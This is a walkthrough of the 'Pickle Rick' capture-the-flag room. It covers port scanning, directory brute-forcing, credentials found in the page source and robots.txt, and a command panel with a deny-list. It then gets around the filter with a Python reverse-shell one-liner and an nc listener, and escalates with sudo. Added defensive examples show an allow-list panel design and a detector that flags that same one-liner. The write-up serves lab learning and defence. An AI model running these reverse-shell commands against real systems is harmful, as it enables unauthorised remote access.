Pickle Rick

Pickle Rick is a Rick and Morty themed challenge that requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle. No knowledge of the show is required.

On the first page, there is nothing worth looking at. I tried clicking around the picture a bit to see if it led to a link, but nothing of that sort. The next step was to inspect element and view the source. On doing so, the very first thing visible was:

As we can see, the username is important, so we keep it in mind.

Username: R1ckRul3s

We do not see any other useful information via inspect element. Next step: enumeration. First, we run nmap, which tells us which ports are open:

nmap -A <ip address>

and the output is:

Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-24 20:54 IST
Nmap scan report for 10.10.191.134
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:26:28:e2:08:ac:c3:90:c0:89:05:f1:a0:13:25:bd (RSA)
|   256 ee:03:58:01:26:f9:78:ce:44:8a:12:01:f6:83:ba:1f (ECDSA)
|_  256 c8:ce:f3:b3:65:32:cd:20:60:24:f2:cd:63:eb:bc:06 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.26 seconds

As you can see, only 2 ports are open, 22 and 80. I tried going to both of them by <ip address>/<port num> but there was nothing useful there. Still a good thing to know.

Next up, we try to enumerate better. dirsearch (https://github.com/maurosoria/dirsearch) is a really cool command-line tool that brute forces directories, files etc. on the specified webserver. Once you have installed it on your system, just type in:

python3 dirsearch.py -u http://<ip address>

It will take about 2-3 minutes to get the output.

Now, it shows a lot of files, most of which are hidden and hence unimportant. The ones that may be important are the ones highlighted by the tool, so we start checking those out. First up, let's go to the assets directory it mentioned.

Honestly, this was a bit disappointing, there was nothing of use here :p. If you want, go check out all the different files mentioned and you will probably come to the same conclusion. Next up, let's check out index.html. Uh well, that just takes us back to the home page. Next one: login.php. This takes us to a login page! Remember the username we found in the source? This might be where we need to use it! Now we need to figure out the password. I checked the source code of this page as well and found nothing interesting in it. Let's go to the next page, robots.txt.

Boom! We find <password> written on this page! Now let's try to put that in as the credentials and see where it leads us.

We land on portal.php, which shows us a command panel! How exciting. Go around the website a bit and click on the different tabs. Nothing of use is seen there either. So the main key to solving this puzzle is the command panel. Try typing ls into the command panel and see what comes back.

This is nice! There are two files which immediately look pretty interesting, Sup3rS3cretPickl3Ingred.txt and clue.txt. Let's check them out with cat.

If you did try the cat command, you probably hit a wall telling you that the command has been disabled and you must try some other way to retrieve the files. Now, simple Google searches would probably reveal multiple different methods of displaying the files without using cat at all, but since that is against the spirit of the room I will skip over that :p
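The panel above blocks the word cat but still hands everything else to a shell, which is exactly the pattern a word deny-list cannot save. The following is an added example, not the room's portal.php (whose code is not on the page); it is an assumed reconstruction of a deny-list panel beside the allow-list design a developer should use instead: a fixed menu of actions mapped to fixed argument vectors, no shell, and user input accepted only as a validated argument.

```python
import re
import subprocess

# Assumed reconstruction of the room's filter: a word deny-list in front of a shell.
# Anything that does not literally contain a banned word reaches /bin/sh unchanged.
DENIED_WORDS = {"cat", "python"}


def denylist_panel(cmd):
    """Weak design. Returns (allowed, argv) without executing anything."""
    if any(word in DENIED_WORDS for word in cmd.split()):
        return False, None
    # A real panel would do subprocess.run(cmd, shell=True) here; the shell, not
    # the filter, decides what the string means, so the deny-list is easily moot.
    return True, ["/bin/sh", "-c", cmd]


# Hardened design: every action is a fixed argv; the client never supplies a program.
ALLOWED_ACTIONS = {
    "list": ["ls", "-l"],
    "disk": ["df", "-h"],
    "uptime": ["uptime"],
}
# Optional argument: plain file name only, no path separators or shell metacharacters.
SAFE_ARG = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]*")


def allowlist_panel(action, arg=None):
    """Returns (allowed, argv); argv is safe to pass to subprocess.run without a shell."""
    if action not in ALLOWED_ACTIONS:
        return False, None
    argv = list(ALLOWED_ACTIONS[action])
    if arg is not None:
        if action != "list" or not SAFE_ARG.fullmatch(arg):
            return False, None
        argv.append(arg)
    return True, argv


def run(argv):
    """Execute an allow-listed argv directly (no shell) and return its stdout."""
    return subprocess.run(argv, capture_output=True, text=True, timeout=5).stdout
```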

So we have a command line where the website is not allowing us to use some commands. Let's see if it allows us to use Python to get a reverse shell back to our terminal. Try typing in python or python3. You will observe that it does not allow python but does allow python3. Boom, now we just need to execute the command to get the reverse shell.

Here is a cheatsheet displaying different reverse shell commands: https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

For the Python one, just remember that the 'attacker's IP' is our own IP address (how to find it is easy to google), and specify any port that you want. Before executing the command, just type in:

nc -nlvp <port number>

Leave this command running in your terminal and copy the following, as given in the cheatsheet:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR IP>",<PORT NUMBER>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Type this into the command line on the website and you will see the shell connect in your terminal.
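From the blue-team side, the step just taken leaves a very recognisable trace: the web server's worker user spawns an interpreter with a -c one-liner that wires a socket to a shell. As an added example (not from the page or the room), here is a small triage routine run over constructed process-start events in an assumed parent|user|cmdline format; the second event is the one-liner from the cheatsheet with a constructed address.

```python
import re
import shlex
from os.path import basename

# Constructed sample events (parent_exe|user|cmdline); not real telemetry.
SAMPLE_EVENTS = [
    "apache2|www-data|ls",
    "apache2|www-data|python3 -c 'import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"192.0.2.10\",4444));os.dup2(s.fileno(),0);"
    "os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
    "p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "cron|root|python3 /opt/backup.py",
    "apache2|www-data|cat clue.txt",
]

WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm"}
WEB_USERS = {"www-data", "apache", "nginx"}
INTERPRETERS = {"python", "python3", "perl", "ruby", "php", "sh", "bash", "nc"}
# Fragments of a one-liner that connects a socket and hands the fds to a shell.
SHELL_WIRING = re.compile(r"\.connect\(|dup2\(|/bin/(?:ba)?sh")


def classify(event):
    """Return (severity, reason) for one process-start event."""
    parent, user, cmdline = event.split("|", 2)
    if parent not in WEB_PARENTS and user not in WEB_USERS:
        return "none", "not spawned from the web tier"
    try:
        argv = shlex.split(cmdline)   # honours the quoting of the -c payload
    except ValueError:
        argv = cmdline.split()
    exe = basename(argv[0]) if argv else ""
    if exe in INTERPRETERS and "-c" in argv and SHELL_WIRING.search(cmdline):
        return "high", f"{parent} ran {exe} -c one-liner that wires a socket to a shell"
    if exe in INTERPRETERS:
        return "medium", f"{parent} spawned interpreter {exe} as {user}"
    return "low", f"{parent} spawned {exe} as {user} (command execution from web tier)"


def triage(events):
    """Severity per event, in input order, for sorting or counting alerts."""
    return [classify(e)[0] for e in events]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        severity, reason = classify(event)
        print(f"[{severity:6}] {reason}")
```

Even the "low" hits matter here: a web server worker running ls or cat at all is the command panel being used, which on a production host is itself worth an alert.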

Well, now our cat works! Just cat the Sup3rS3cretPickl3Ingred.txt file and you will have the first answer. Next up, cat clue.txt. This tells you to just look around the file structure for other text files.

Honestly, the "hacking" part of the room is done here; now you just need to find the files, which is easy enough. I will give you some hints for that, but imo there is no need for more explanation.

For the second clue: check out the home directory, you might find something interesting there :p

For the third clue: check out the root directory using the sudo command!

And boom, you are done!